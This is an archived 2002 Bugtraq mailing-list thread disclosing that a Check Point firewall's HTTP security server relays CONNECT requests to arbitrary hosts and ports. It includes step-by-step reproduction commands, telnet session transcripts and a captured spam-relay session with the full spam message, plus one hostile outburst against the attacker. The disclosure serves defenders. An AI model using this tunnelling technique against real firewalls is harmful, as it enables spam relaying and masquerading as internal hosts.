Bugtraq mailing list archives
Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall]
From: "Dennis Henderson" <hendo () hendohome com>
Date: Tue, 19 Feb 2002 20:32:19 -0600
William, I was only partially able to reproduce your issue and it was only to destinations and services that my firewall would have already allowed anyway. root@mojo:~# telnet www.xxx.com 80 Trying 19x.1x8.xx6.1x3... Connected to www.xxx.com. Escape character is '^]'. CONNECT 1x8.1x6.xx1.1x6:25 / HTTP/1.0 HTTP/1.0 200 220 ESMTP helo firewall 250 mail.xxx.com Hello [1x8.1x6.xx1.1x5], pleased to meet you quit 221 2.0.0 mail.xxx.com closing connection Connection closed by foreign host. Any other connection attempt to a IP:port that was not normally allowed by policy was denied. root@mojo:~# telnet www.xxx.com 80 Trying 19x.1x8.xx6.1x3... Connected to www.xxx.com. Escape character is '^]'. CONNECT 1x8.1x6.xx1.1x6:22 / HTTP/1.0 HTTP/1.0 200 Pragma: no-cache Cache-Control: no-cache Content-Type: text/html Content-Length: 85 <TITLE>Error</TITLE> <BODY> <H1>Error</H1> FW-1 at xxxexmfwx: Access denied.</BODY> Connection closed by foreign host. While it is a little startling that Checkpoint would allow this kind of connection, I was not able to actually connect to any place that I would not normally be able to connect from the internet. I do not allow http tunneling. We are running the http security server strictly to block the nimda and code red attacks. I am running 4.1 Sp5 Regards Dennis ----- Original Message ----- From: "William D. Colburn (aka Schlake)" <wcolburn () nmt edu> To: <bugtraq () securityfocus com>; "Dan Lunceford" <dan () nmt edu>; "Ryan" <ryan () nmt edu>; <support () aquilagroup com> Cc: "Madeline Navarrette" <mnavarre () ts checkpoint com> Sent: Monday, February 18, 2002 6:09 PM Subject: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall]
Checkpoint bounced my mail because I'm not a checkpoint customer, so I contacted customer advocacy and resent it to a different address (this message is copied to her as well). I was told that the issue would be propogated to an appropriate person. Please drop the old message and continue to hold this message until Checkpoint responds. I have a few updates to this issue that I have learned since I crafted the original message. I only need to give the "CONNECT" line, and nothing else. After the second newline there is a pause and then the TCP stream is open. I seem to be able to open any port on any machine I want *except* port 80. I was able to telnet in to UNIX login with the firewall appearing as the remote host. The initial machine I use (inside the firewall) does not need to actually exist, I merely have to attempt to connect to an IP address "inside" on port 80. This whole give anyone outside a firewall the ability to masquerade on any TCP service (except WWW) as a machine inside the domain of the firewall. As far as I can tell there are no logs on this, and it is hard to detect on the firewall. I found it by doing a tcpdump of all packets and gradually narrowing down my filters until I was able to "catch" an entire transaction. ----- Forwarded message from "William D. Colburn (aka Schlake)"
<wcolburn () nmt edu> -----
Step one: telnet to a machine behind the checkpoint firewall on port 80 Step two: Type the following:CONNECT mailserver.somecompany.com:25 / HTTP/1.0 User-Agent: eeep Cache-Control: private,no-cache Pragma: no-cacheStep three: wait a moment for your SMTP banner to pop up. I will attach an actual attack I caputured with tcpdump and ethereal. The file is the result of an ethereal "Follow TCP stream". I hate the person who did this to me and I hope they die a terrible death. -- William Colburn, "Sysprog" <wcolburn () nmt edu> Computer Center, New Mexico Institute of Mining and Technology http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn --AqsLC8rIMeq19msA Content-Type: text/plain; charset=us-ascii Content-Disposition: attachment; filename=checkpoint From root () netpeep nmt edu Mon Feb 18 16:05:43 2002 Return-Path: <root () netpeep nmt edu> Received: from netpeep.nmt.edu (netpeep.nmt.edu [129.138.250.10]) by mailhost.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hF0009872 for <schlake () nmt edu>; Mon, 18 Feb 2002 16:05:43 -0700 Received: from netpeep.nmt.edu (localhost [127.0.0.1]) by netpeep.nmt.edu (8.12.2/8.12.2) with ESMTP id g1IN5hnA020585 for <schlake () nmt edu>; Mon, 18 Feb 2002 16:05:43 -0700 Received: (from root@localhost) by netpeep.nmt.edu (8.12.2/8.12.1/Submit) id g1IN5h8w020584 for schlake () nmt edu; Mon, 18 Feb 2002 16:05:43 -0700 Date: Mon, 18 Feb 2002 16:05:43 -0700 From: root <root () netpeep nmt edu> Message-Id: <200202182305.g1IN5h8w020584 () netpeep nmt edu> To: schlake () nmt edu Content-Length: 3580 Lines: 112 CONNECT mail2.freeuk.net:25 / HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) Cache-Control: private,no-cache Pragma: no-cache HELO hotmail.com MAIL FROM: <pheros680506 () hotmail com> RCPT TO: <renewinter () freeuk com> RCPT TO: <renewu () freeuk com> RCPT TO: <renfah () freeuk com> RCPT TO: <renfi11160 () freeuk com> RCPT TO: <renfield13 () freeuk com> RCPT TO: <renfield20 () freeuk com> RCPT TO: <renfield94 () freeuk com> RCPT TO: <renfrew () freeuk com> RCPT TO: <renfro33 () freeuk com> RCPT TO: <reng3 () freeuk com> RCPT TO: <renga () freeuk com> RCPT TO: <rengel293 () freeuk com> RCPT TO: <rengel7495 () freeuk com> RCPT TO: <rengelh946 () freeuk com> RCPT TO: <rengers () freeuk com> RCPT TO: <rengised () freeuk com> RCPT TO: <rengl21068 () freeuk com> RCPT TO: <rengl29048 () freeuk com> RCPT TO: <rengl78818 () freeuk com> DATA Reply-To: <pheros680506 () hotmail com> Message-ID: <004b71e11dcb$7144b8d2$6ac55bc3@mlpqff> From: <pheros680506 () hotmail com> To: <renewinter () freeuk com> Cc: <renewu () freeuk com>, <renfah () freeuk com>, <renfi11160 () freeuk com>, <renfield13 () freeuk com>, <renfield20 () freeuk com>, <renfield94 () freeuk com>, <renfrew () freeuk com>, <renfro33 () freeuk com>, <reng3 () freeuk com>, <renga () freeuk com>, <rengel293 () freeuk com>, <rengel7495 () freeuk com>, <rengelh946 () freeuk com>, <rengers () freeuk com>, <rengised () freeuk com>, <rengl21068 () freeuk com>, <rengl29048 () freeuk com>, <rengl78818 () freeuk com> Subject: A new fragrance
(3437AlLf5-384bbsO4815hPeX5-01@27)
MiME-Version: 1.0 Content-Type: text/html; charset="iso-8859-1" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Importance: Normal Hi ! <HTML> <head><title>Pheros attraction</title> </head> <BODY TEXT="#000000" LINK="#000000" VLINK="#000000" BGCOLOR="#7777FF"> <CENTER> <TABLE WIDTH="650"> <TR> <TD COLSPAN="2"> <FONT FACE="VERDANA, ARIAL">Notice: I have paid to be able to send you
this e-mail. I do not intend to
cause you harm, fill up your mailbox or bother you needlessly. I am only trying to reach those who are not as secure in their financial future as I was when I first started looking for a way to earn money online. To be removed, please go to the end of this e-mail. Please forgive me if you receive this advertisement twice.<BR><BR> </FONT> </TD> </TR> <TR> <TD VALIGN="TOP"> <FONT FACE="VERDANA, ARIAL"> Pheros is a lovely fragrance with a touch of human pheromones, packaged in a exclusive crafted box. Pheros is a foolproof tool of seduction, the scent and the pheromones together make a foolproof combination. No one can resist the wearer of this mysterious fragrance! Pheros combines high tech science with the well-known function of the scent of a luxorious perfume. <BR> The price is 19.95
USD/Bottle, including P&P! Payment is done via PayPal!
<BR>To order, klick the Paypal logo <A
HREF="https://www.paypal.com/xclick/business=pheros3%40hotmail.com&item_name =Pheros&item_number=PherInt001&amount=19.95" TARGET="new"><IMG SRC="http://images.paypal.com/images/x-click-but02.gif" border="0"></A>
<BR> </FONT> </TD> <TD> <IMG SRC="http://pheros.freehosting.net/images/Mailbilden.jpg" border="2"> </TD> </TR> <TR> <TD COLSPAN="2"> <BR> <FONT FACE="Verdana, Arial"> To be removed from this mailing list, please reply to this message with
the subjct "remove".
You will be BLOCKED from all mail from this site and your request will
take effect within 24 hours.
</FONT> </TD> </TR> </TABLE> </CENTER> </BODY> </HTML>
[2901sDxs3-632TivA4099LrRl6-563cNjc6630cqwk8-434lwqh9794mwMr2-514eMAy1216cuz @71]
. QUIT --AqsLC8rIMeq19msA-- ----- End forwarded message ----- -- William Colburn, "Sysprog" <wcolburn () nmt edu> Computer Center, New Mexico Institute of Mining and Technology http://www.nmt.edu/tcc/ http://www.nmt.edu/~wcolburn
Current thread:
- UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] William D. Colburn (aka Schlake) (Feb 19)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Dennis Henderson (Feb 19)
- UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Steve VanDevender (Feb 20)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Mike Benham (Feb 20)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Randal L. Schwartz (Feb 21)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Jason Haar (Feb 21)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Ronald F. Guilmette (Feb 21)
- Re: UPDATE: [wcolburn () nmt edu: SMTP relay through checkpoint firewall] Mike Benham (Feb 20)